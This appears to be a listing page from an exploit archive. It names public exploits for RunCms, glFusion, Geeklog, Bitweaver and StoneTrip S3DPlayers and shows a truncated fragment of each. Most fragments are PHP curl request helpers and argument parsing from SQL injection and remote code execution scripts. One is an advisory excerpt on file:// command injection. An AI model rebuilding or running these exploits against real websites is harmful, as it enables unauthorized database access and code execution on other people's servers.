New User, Welcome!     Login

s($url

RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit

            $into_outfile = true;
        }
         
    }
     
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);

glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit

        if (stristr($argv[$i], "--test")) {
            $_test = true;
        }
    }
     
    function _s($url, $ck, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);

Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

        if (stristr($argv[$i], "--sp")) {
            $sp_submit = true;
        }
    }
     
    function _s($url, $auth, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

            $cookies = "geeklog=".$tmp[1]."; password=".$tmp[2].";";
             
        }
    }
     
    function _s($url, $ck, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);

Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit

            $tmp = explode(":", $argv[$i]);
            $port = (int)$tmp[1];
        }
    }
     
    function _s($url, $cmd, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port, $cookie;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);

glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

              }
          }

        $url = "http://$argv[1]:$port";

        function _s($url,$request)
        {
            global $_use_proxy,$proxy_host,$proxy_port;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_POST, 1);

CORE-2009-0401 - StoneTrip S3DPlayers remote command injection

interface the function 'system.openURL' is defined as follows:

/-----------

Prototype
system.openURL(sURL, sTarget)    --Call this function to open an URL.

- -----------/

In the current implementation, the call 'system.openURL(sURL, sTarget)'
with the parameter 'sURL' set as 'file://path/command' will ultimately



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!